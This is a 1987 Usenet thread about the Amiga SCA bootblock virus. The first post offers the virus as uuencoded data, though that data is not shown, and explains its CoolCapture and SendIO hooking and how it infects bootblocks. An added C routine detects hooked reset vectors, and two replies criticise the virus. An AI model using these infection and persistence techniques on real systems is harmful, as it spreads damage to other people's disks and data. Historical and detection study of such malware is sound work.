[comp.sys.amiga] SCA-VIRUS

boxdiger@altger.UUCP (10/28/87)

UUENCODED SCA - VIRUS
---------------------

[ i'm not a bad line, i'm a VIRUS !!!!!!]

This is for Bill (CATS) and other virus-lovers.
The uuencoded virus is not an install program, it's the dumped data
of block 0+1 of an infected disk (SCA VIRUS).
The code can be written to disk using a utility like c-monitor
(reading the file to memory and then writing it to disk) or diskzap.
I used C-monitor (a German program).

Some information:
-----------------
- The virus copies itself to $7ec00 in your Amiga (end of chip memory).
- It changes the CoolCapture-pointer in Execbase in order to be
  called each time you hit C-A-A.
- The routine pointed to by CoolCapture changes the SendIO function.
- The new SendIO examines the IORequest and if it's the request to
  read the bootblock, reads it and, if not infected, writes its
  own code to the bootblock.
- CoolCapture will be changed every time the virus is called,
  because Exec sets up the original vectors at each reset.
- You can enable the reinitialization of CoolCapture by pressing the
  left mouse button down while resetting. The screen will then
  become green for a few ticks.
- There is a counter built in which is incremented on each
  infection. This counter is ANDed with $f (15) and, if true,
  a little (nice ?) message appears on your screen.

Good Amiga-hack

             Pat.

==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==
|                                                                        |
|  <^_^> Patrick G., living in Switzerland, using a german system.       |
|                                                                        |
|  UUCP : ....seismo!mcvax!unido!altger!boxdiger  Yep that's all folks ! |
|  Phone: Don't try it, i'm not a home....                               |
==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==


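A detection-side check for the persistence mechanism described in the post above, as an added example that is not part of the original thread: it inspects a snapshot of ExecBase (for instance, a memory dump from an emulator) for non-zero reset-capture vectors and flags a CoolCapture that points into the $7ec00 region the post names. The structure offsets, the 512 KB chip-memory bound, and all function and constant names are assumptions of this example; a non-zero vector is a reason to investigate, not proof of infection.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumption: vector offsets follow the standard exec/execbase.h layout. */
#define OFF_COLDCAPTURE 42
#define OFF_COOLCAPTURE 46
#define OFF_WARMCAPTURE 50
#define EXECBASE_MIN    54          /* bytes needed to cover all three */
#define SCA_ADDR   0x0007EC00u      /* resident address given in the post */
#define CHIP_END   0x00080000u      /* assumption: 512 KB of chip memory */

enum { CAP_BAD_INPUT = -1, CAP_CLEAN = 0, CAP_COLD = 1, CAP_COOL = 2,
       CAP_WARM = 4, CAP_COOL_AT_SCA_ADDR = 8 };

/* The 68000 is big-endian; decode explicitly so this runs on any host. */
static uint32_t get_be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

static void put_be32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}

/* Returns a bitmask of non-zero capture vectors found in an ExecBase snapshot. */
int check_capture_vectors(const uint8_t *execbase, size_t len) {
    if (execbase == NULL || len < EXECBASE_MIN) return CAP_BAD_INPUT;
    uint32_t cool = get_be32(execbase + OFF_COOLCAPTURE);
    int flags = CAP_CLEAN;
    if (get_be32(execbase + OFF_COLDCAPTURE) != 0) flags |= CAP_COLD;
    if (get_be32(execbase + OFF_WARMCAPTURE) != 0) flags |= CAP_WARM;
    if (cool != 0) {
        flags |= CAP_COOL;
        if (cool >= SCA_ADDR && cool < CHIP_END) flags |= CAP_COOL_AT_SCA_ADDR;
    }
    return flags;
}

int main(void) {
    uint8_t snap[EXECBASE_MIN] = {0};   /* constructed sample, not a real dump */
    printf("clean snapshot   -> %d\n", check_capture_vectors(snap, sizeof snap));
    put_be32(snap + OFF_COOLCAPTURE, 0x0007EC10u);  /* constructed pointer value */
    printf("patched snapshot -> %d\n", check_capture_vectors(snap, sizeof snap));
    return 0;
}
```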

sean@ms.uky.edu (Sean Casey) (10/30/87)

In article <15000003@altger.UUCP> boxdiger@altger.UUCP writes:
>- It changes the CoolCapture-pointer in Execbase in order to be
>  called each time you hit C-A-A.

I had been under the impression that C-A-A did some sort of hardware reset
and could not be trapped.  So what this means is that it is possible to totally
take over the machine to the point where it must be powered down to regain
control.

This is really a shame, because some software writer is bound to use it someday
to protect his game.  Even worse, it means one can write a trojan horse that
does nasty things while the user is trying to reset his machine.

Sean

-- 
--  Sean Casey               sean@ms.uky.edu, {rutgers,uunet,cbosgd}!ukma!sean
--  (the Empire guy)         sean@ms.uky.csnet,  sean@UKMA.BITNET
--  "Inconceivable!"

farren@gethen.UUCP (10/31/87)

In article <15000003@altger.UUCP> boxdiger@altger.UUCP writes:
[after a discussion of the virus and even a uuencoded virus bootblock]
>
>Good Amiga-hack
>

No.  BAD Amiga-hack.  While it's technically interesting, it does damage
(and, in the case of copy-protected commercial software, potentially
fatal damage) to otherwise innocent disks.  BAD!

Anything which is going to alter, in any way, someone's system or data,
without giving him/her the opportunity to NOT alter them (by not running 
the program, if need be) is bad.  I don't care how benign the virus is
supposed to be, it is still a childish stunt, accomplishing nothing
except to make a lot of people a little more paranoid about their
Amigas.  Are we supposed to think this is a good thing?  I don't.


-- 
----------------
Michael J. Farren      "... if the church put in half the time on covetousness
unisoft!gethen!farren   that it does on lust, this would be a better world ..."
gethen!farren@lll-winken.arpa             Garrison Keillor, "Lake Wobegon Days"